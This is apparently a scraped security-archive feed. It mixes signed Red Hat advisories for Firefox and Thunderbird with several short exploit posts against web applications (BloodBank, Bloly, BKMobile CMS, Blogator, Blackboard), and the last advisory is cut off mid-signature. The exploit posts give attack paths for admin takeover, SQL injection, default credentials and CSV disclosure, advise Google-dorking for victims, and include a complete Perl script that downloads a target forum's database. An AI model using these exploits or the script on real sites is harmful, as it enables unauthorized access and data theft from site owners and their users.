BloodBank version 1.0 suffers from an insecure direct object reference vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration unauthorized administrative access Vulnerability  || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /admin/subscriber-csv.php[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/admin/subscriber-csv.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BloodBank 1.0 Insecure Direct Object Reference

Red Hat Security Advisory 2023-4070-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.13.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:4070-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4070  
Issue date:        2023-07-13  
CVE Names:         CVE-2023-37201 CVE-2023-37202 CVE-2023-37207   
                   CVE-2023-37208 CVE-2023-37211   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.13.0 ESR.

Security Fix(es):

* Mozilla: Use-after-free in WebRTC certificate generation (CVE-2023-37201)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-37202)

* Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and  
Thunderbird 102.13 (CVE-2023-37211)

* Mozilla: Fullscreen notification obscured (CVE-2023-37207)

* Mozilla: Lack of warning when opening Diagcab files (CVE-2023-37208)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2219747 - CVE-2023-37201 Mozilla: Use-after-free in WebRTC certificate generation  
2219748 - CVE-2023-37202 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2219749 - CVE-2023-37207 Mozilla: Fullscreen notification obscured  
2219750 - CVE-2023-37208 Mozilla: Lack of warning when opening Diagcab files  
2219751 - CVE-2023-37211 Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
firefox-102.13.0-2.el8_2.src.rpm

aarch64:  
firefox-102.13.0-2.el8_2.aarch64.rpm  
firefox-debuginfo-102.13.0-2.el8_2.aarch64.rpm  
firefox-debugsource-102.13.0-2.el8_2.aarch64.rpm

ppc64le:  
firefox-102.13.0-2.el8_2.ppc64le.rpm  
firefox-debuginfo-102.13.0-2.el8_2.ppc64le.rpm  
firefox-debugsource-102.13.0-2.el8_2.ppc64le.rpm

s390x:  
firefox-102.13.0-2.el8_2.s390x.rpm  
firefox-debuginfo-102.13.0-2.el8_2.s390x.rpm  
firefox-debugsource-102.13.0-2.el8_2.s390x.rpm

x86_64:  
firefox-102.13.0-2.el8_2.x86_64.rpm  
firefox-debuginfo-102.13.0-2.el8_2.x86_64.rpm  
firefox-debugsource-102.13.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
firefox-102.13.0-2.el8_2.src.rpm

aarch64:  
firefox-102.13.0-2.el8_2.aarch64.rpm  
firefox-debuginfo-102.13.0-2.el8_2.aarch64.rpm  
firefox-debugsource-102.13.0-2.el8_2.aarch64.rpm

ppc64le:  
firefox-102.13.0-2.el8_2.ppc64le.rpm  
firefox-debuginfo-102.13.0-2.el8_2.ppc64le.rpm  
firefox-debugsource-102.13.0-2.el8_2.ppc64le.rpm

s390x:  
firefox-102.13.0-2.el8_2.s390x.rpm  
firefox-debuginfo-102.13.0-2.el8_2.s390x.rpm  
firefox-debugsource-102.13.0-2.el8_2.s390x.rpm

x86_64:  
firefox-102.13.0-2.el8_2.x86_64.rpm  
firefox-debuginfo-102.13.0-2.el8_2.x86_64.rpm  
firefox-debugsource-102.13.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
firefox-102.13.0-2.el8_2.src.rpm

aarch64:  
firefox-102.13.0-2.el8_2.aarch64.rpm  
firefox-debuginfo-102.13.0-2.el8_2.aarch64.rpm  
firefox-debugsource-102.13.0-2.el8_2.aarch64.rpm

ppc64le:  
firefox-102.13.0-2.el8_2.ppc64le.rpm  
firefox-debuginfo-102.13.0-2.el8_2.ppc64le.rpm  
firefox-debugsource-102.13.0-2.el8_2.ppc64le.rpm

s390x:  
firefox-102.13.0-2.el8_2.s390x.rpm  
firefox-debuginfo-102.13.0-2.el8_2.s390x.rpm  
firefox-debugsource-102.13.0-2.el8_2.s390x.rpm

x86_64:  
firefox-102.13.0-2.el8_2.x86_64.rpm  
firefox-debuginfo-102.13.0-2.el8_2.x86_64.rpm  
firefox-debugsource-102.13.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37201  
https://access.redhat.com/security/cve/CVE-2023-37202  
https://access.redhat.com/security/cve/CVE-2023-37207  
https://access.redhat.com/security/cve/CVE-2023-37208  
https://access.redhat.com/security/cve/CVE-2023-37211  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkr/6lAAoJENzjgjWX9erEV1MP/ipOMglJO752WnvtwEYdnYXI  
yh0DY3e+PI89XT7BB1r/YVDWrHM3tjkRu1hyjSaunqskhgqpuiv3AzcyHCpAA0Fr  
os4c9LO8O/t7PBlgpZylKfI7yWL+yv4FlOTF6zcuMfDupafeE1cPfvfmWhWbh1cL  
6btMBvsydqF6y2FH/qV3gnKL+qoYZq5lZZ2lFj3RbqOSUnZbGZXBXvTdZbhFh79p  
Q9kKAYlyzww+uSBjNBQPVVky86pQNhbJLQH58fXVwMyPGe1aSsD5Jcvm3Fzf3bTz  
2o+6I+QBRtBvnP6STQj2isG//sIRHaXawdxANWJSun1Pjq0W8X2H9hUPAI6H87uu  
GsWtLKZ+fR2JgY1e38An/696fplH4xCglbERBAw3y9HvTumvn+HawcFl28+EIM/7  
Ykp6OCM/nXspc3b23DXwQxrPrtEfdsmjGnoWa7tNvin882aTTZh8t26X4ZQC8Hyx  
bmFtZlvSu/y2crZV4SaYFSfMMpl/K4iqzLLTptPjb0uovMS5mAfYahgHw8dtylhN  
hLSJkhK/JRctak8sONKflGXQ7SPHRhwPJ9itV4giP55ybFR0JaykInVdSCC4iJAG  
EyoXndkwY5Ys02jzhCj1lkl8Pv7swX93FLVV37n1eCdoFPJ55cBfaIAUo4n42+IF  
+Dle6KK6Ioydn7CNjZ8n  
=kL6R  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4070-01

Bloly version 1.3 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : Bloly v1.3 Add admin Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.bloly.com/download.php                                                                                  || # Dork      : Bloly v1.3 by SoftCab Inc                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload to add new admin login : /blog/install.php .[+] http://127.0.0.1/www/grupomedbrasilcom.br/blog/install.php   ( add new admin login )[+] http://127.0.0.1/www/grupomedbrasil.combr/blog/index.php?action=3   ( Login from Her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Bloly 1.3 Add Administrator

Red Hat Security Advisory 2023-4064-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.13.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4064-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4064  
Issue date:        2023-07-13  
CVE Names:         CVE-2023-37201 CVE-2023-37202 CVE-2023-37207   
                   CVE-2023-37208 CVE-2023-37211   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.13.0.

Security Fix(es):

* Mozilla: Use-after-free in WebRTC certificate generation (CVE-2023-37201)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-37202)

* Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and  
Thunderbird 102.13 (CVE-2023-37211)

* Mozilla: Fullscreen notification obscured (CVE-2023-37207)

* Mozilla: Lack of warning when opening Diagcab files (CVE-2023-37208)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2219747 - CVE-2023-37201 Mozilla: Use-after-free in WebRTC certificate generation  
2219748 - CVE-2023-37202 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2219749 - CVE-2023-37207 Mozilla: Fullscreen notification obscured  
2219750 - CVE-2023-37208 Mozilla: Lack of warning when opening Diagcab files  
2219751 - CVE-2023-37211 Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-102.13.0-2.el9_2.src.rpm

aarch64:  
thunderbird-102.13.0-2.el9_2.aarch64.rpm  
thunderbird-debuginfo-102.13.0-2.el9_2.aarch64.rpm  
thunderbird-debugsource-102.13.0-2.el9_2.aarch64.rpm

ppc64le:  
thunderbird-102.13.0-2.el9_2.ppc64le.rpm  
thunderbird-debuginfo-102.13.0-2.el9_2.ppc64le.rpm  
thunderbird-debugsource-102.13.0-2.el9_2.ppc64le.rpm

s390x:  
thunderbird-102.13.0-2.el9_2.s390x.rpm  
thunderbird-debuginfo-102.13.0-2.el9_2.s390x.rpm  
thunderbird-debugsource-102.13.0-2.el9_2.s390x.rpm

x86_64:  
thunderbird-102.13.0-2.el9_2.x86_64.rpm  
thunderbird-debuginfo-102.13.0-2.el9_2.x86_64.rpm  
thunderbird-debugsource-102.13.0-2.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37201  
https://access.redhat.com/security/cve/CVE-2023-37202  
https://access.redhat.com/security/cve/CVE-2023-37207  
https://access.redhat.com/security/cve/CVE-2023-37208  
https://access.redhat.com/security/cve/CVE-2023-37211  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkr/6kAAoJENzjgjWX9erEB64P/Ru8eBi3b+ZoXmh0eXWohQGT  
FjBodLnrxNMKcVgSUyzknVW3IPdyNaTvzrToIiyM9Y+seEaQ/MWRxkX29+xYl/wz  
infucPBrPyy8qepkNf3tLr23zZk3eTl9rUQXQWlTb8hNmr1chPEZPRxbnSEQhKie  
6chWGQMwvv6XSwVEok2Fj4h4EVDa6FcOvQoHl90+Al7bQWOEzZGK/+gSaD6tvQEn  
SRL2krCXr6kEMXdTOVTGoKmPFlnBys2KX7QHn6/MfF92bZFPxWPBiSI21QhagF8H  
cS2SuSSNMNeQKyRYmix+gc3DIQx7EP4zwSoBr4Zf5IZU78fCzgckTEKlxzg+EQ9v  
GjSjwu5CSIdWzgI64jG1vhaGYRbBStsSJtIIE6Oa8co8L8a5jspA94YGDFAfbY/G  
KG4ZGWszD8sv3X9jjSvbDuvvTaRyqgQDlKUba5Uad334/Ve5vmsqpAqk4pIPZ2VC  
cKz2z/HwrFcg3zR0/L8nYN6bhyZOm3nNqwEFcW2B9bxqNixqjn7+GHfzkXN5q+f2  
VBmfQTQux7jB0oRp8MlrnHiTeiAa3G5uJsytHI0l7obgstLdfzsbPEgnYWLs9vpM  
/xVN7wnmjCCz4PnlHUAWFbmGEsfxJU2yvaFULoPgo5Fn+XiAd8JVXU8w0YuRnvrL  
l+OvWgMJHHk04MxjZV1g  
=zAQY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4064-01

BKMobile CMS version 1.5.0 suffers from a remote blind SQL injection vulnerability.

    ====================================================================================================================================| # Title     : BKMobile-CMS V1.5.0 Blind SQL Injection Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://bekustom.com/                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine[+] http://127.0.0.1/BKMobileCMS/user/full_blog_summary.php?blog_id= <=====| inject Her[+] http://127.0.0.1/BKMobileCMS/admin/ = loginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BKMobile CMS 1.5.0 SQL Injection

Red Hat Security Advisory 2023-4065-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.13.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:4065-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4065  
Issue date:        2023-07-13  
CVE Names:         CVE-2023-37201 CVE-2023-37202 CVE-2023-37207   
                   CVE-2023-37208 CVE-2023-37211   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.13.0.

Security Fix(es):

* Mozilla: Use-after-free in WebRTC certificate generation (CVE-2023-37201)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-37202)

* Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and  
Thunderbird 102.13 (CVE-2023-37211)

* Mozilla: Fullscreen notification obscured (CVE-2023-37207)

* Mozilla: Lack of warning when opening Diagcab files (CVE-2023-37208)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2219747 - CVE-2023-37201 Mozilla: Use-after-free in WebRTC certificate generation  
2219748 - CVE-2023-37202 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2219749 - CVE-2023-37207 Mozilla: Fullscreen notification obscured  
2219750 - CVE-2023-37208 Mozilla: Lack of warning when opening Diagcab files  
2219751 - CVE-2023-37211 Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.13.0-2.el8_1.src.rpm

ppc64le:  
thunderbird-102.13.0-2.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.13.0-2.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.13.0-2.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.13.0-2.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.13.0-2.el8_1.x86_64.rpm  
thunderbird-debugsource-102.13.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37201  
https://access.redhat.com/security/cve/CVE-2023-37202  
https://access.redhat.com/security/cve/CVE-2023-37207  
https://access.redhat.com/security/cve/CVE-2023-37208  
https://access.redhat.com/security/cve/CVE-2023-37211  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkr/6PAAoJENzjgjWX9erEY2YQAJJ5zs2ZzqjvZtzoExTnO2Ph  
7OWp7LzAe7sqx8urFd/QMHiDQ0IDBj3MPzrvuGuOkno5QcN4eszKI+QhbjM8jadi  
g/cHq/9nS7sbbZbVdE7xNhb6cjHu8r7e54reuq+nrG/Mt1aAuhOnaTdQ7k8Ew9GA  
FNG3cId6po8HpTu/o6Fkx2DWnEmxpPeavKZpTllFQ93znqUfqs6y1yWEeLMRyRak  
ckrqCl4YcDbbFUHCkx65W1zVwwJJ9J1Y7yCUp3kq5l/PRsOEpaeEctY4P+5wT4n9  
eft075r3b/+DYIT+3guBWOTVvi8JHHqLfi2upO4kIF7RJx+cZmvqxvojOHCMk8H6  
5VZWMA5WvRe4mi5G/z28uhzSX/kMvDkEHmi4/xWANyvCPDtJP42GQnB6X2AGPad0  
IeamsuQTeV5g6xOs5U2tQwm5zMteZWTdCKqqpzBONGth5An2iBMZWlfvRM/HKO81  
JUTiOqsGiVklypMDWi+/wTns/vCHn0PEPf4XKvLV0JCIJyaqeRlH085j9ylXP8h1  
i25Pru1NiRtVmwsgapwo2nnyp+uuc8anUhmhcBGyNVaeEgSbxBNj24SYcP4hL3ww  
xdyIJlZQlb8ONFvSuUmlpeyGEoUdHPcWr0W0w8R3ge1DwLx64WhtZvU0i6XZ1DjQ  
U+ePBfKTBPlWsq0GWPhU  
=Zut7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4065-01

Blogator Script version 0.93 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 Reinstall default Password Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /bs_auth.php = default pass is admin[+] http://127.0.0.1/courir33net/group33/blog/bs_auth.php = default pass is adminGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Blogator Script 0.93 Insecure Settings

Blackboard version 2.0.2 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : blackboard v 2.0.2 Database Disclosure Exploit                                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# blackboard v 2.0.2 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('blackboard v 2.0.2 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Blackboard 2.0.2 Database Disclosure

Red Hat Security Advisory 2023-4075-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.13.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:4075-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4075  
Issue date:        2023-07-13  
CVE Names:         CVE-2023-37201 CVE-2023-37202 CVE-2023-37207   
                   CVE-2023-37208 CVE-2023-37211   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.13.0 ESR.

Security Fix(es):

* Mozilla: Use-after-free in WebRTC certificate generation (CVE-2023-37201)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-37202)

* Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and  
Thunderbird 102.13 (CVE-2023-37211)

* Mozilla: Fullscreen notification obscured (CVE-2023-37207)

* Mozilla: Lack of warning when opening Diagcab files (CVE-2023-37208)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2219747 - CVE-2023-37201 Mozilla: Use-after-free in WebRTC certificate generation  
2219748 - CVE-2023-37202 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2219749 - CVE-2023-37207 Mozilla: Fullscreen notification obscured  
2219750 - CVE-2023-37208 Mozilla: Lack of warning when opening Diagcab files  
2219751 - CVE-2023-37211 Mozilla: Memory safety bugs fixed in Firefox 115, Firefox ESR 102.13, and Thunderbird 102.13

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
firefox-102.13.0-2.el8_4.src.rpm

x86_64:  
firefox-102.13.0-2.el8_4.x86_64.rpm  
firefox-debuginfo-102.13.0-2.el8_4.x86_64.rpm  
firefox-debugsource-102.13.0-2.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
firefox-102.13.0-2.el8_4.src.rpm

aarch64:  
firefox-102.13.0-2.el8_4.aarch64.rpm  
firefox-debuginfo-102.13.0-2.el8_4.aarch64.rpm  
firefox-debugsource-102.13.0-2.el8_4.aarch64.rpm

ppc64le:  
firefox-102.13.0-2.el8_4.ppc64le.rpm  
firefox-debuginfo-102.13.0-2.el8_4.ppc64le.rpm  
firefox-debugsource-102.13.0-2.el8_4.ppc64le.rpm

s390x:  
firefox-102.13.0-2.el8_4.s390x.rpm  
firefox-debuginfo-102.13.0-2.el8_4.s390x.rpm  
firefox-debugsource-102.13.0-2.el8_4.s390x.rpm

x86_64:  
firefox-102.13.0-2.el8_4.x86_64.rpm  
firefox-debuginfo-102.13.0-2.el8_4.x86_64.rpm  
firefox-debugsource-102.13.0-2.el8_4.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
firefox-102.13.0-2.el8_4.src.rpm

aarch64:  
firefox-102.13.0-2.el8_4.aarch64.rpm  
firefox-debuginfo-102.13.0-2.el8_4.aarch64.rpm  
firefox-debugsource-102.13.0-2.el8_4.aarch64.rpm

ppc64le:  
firefox-102.13.0-2.el8_4.ppc64le.rpm  
firefox-debuginfo-102.13.0-2.el8_4.ppc64le.rpm  
firefox-debugsource-102.13.0-2.el8_4.ppc64le.rpm

s390x:  
firefox-102.13.0-2.el8_4.s390x.rpm  
firefox-debuginfo-102.13.0-2.el8_4.s390x.rpm  
firefox-debugsource-102.13.0-2.el8_4.s390x.rpm

x86_64:  
firefox-102.13.0-2.el8_4.x86_64.rpm  
firefox-debuginfo-102.13.0-2.el8_4.x86_64.rpm  
firefox-debugsource-102.13.0-2.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37201  
https://access.redhat.com/security/cve/CVE-2023-37202  
https://access.redhat.com/security/cve/CVE-2023-37207  
https://access.redhat.com/security/cve/CVE-2023-37208  
https://access.redhat.com/security/cve/CVE-2023-37211  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkr/6MAAoJENzjgjWX9erEYtAP/R2AmzafdY60xfPvCgTCZCqx  
u8G9mloDscKUh/FY/ckBRYKQrOpt+QyUtE5TxKcAWAvIq0CUgZP//nlra1JXtS+B  
Wpd4gM5zv8VH8jJWunWZdnxSv+t2BS7eHDUiPbpeT/edMvPkpea0tMW+NHxYFypD  
eryZiI94a/qK+HZ6BeIMixb2Sd0FfnlhxrSPoQnRclxf5kICoNfm9FRUooaw94TV  
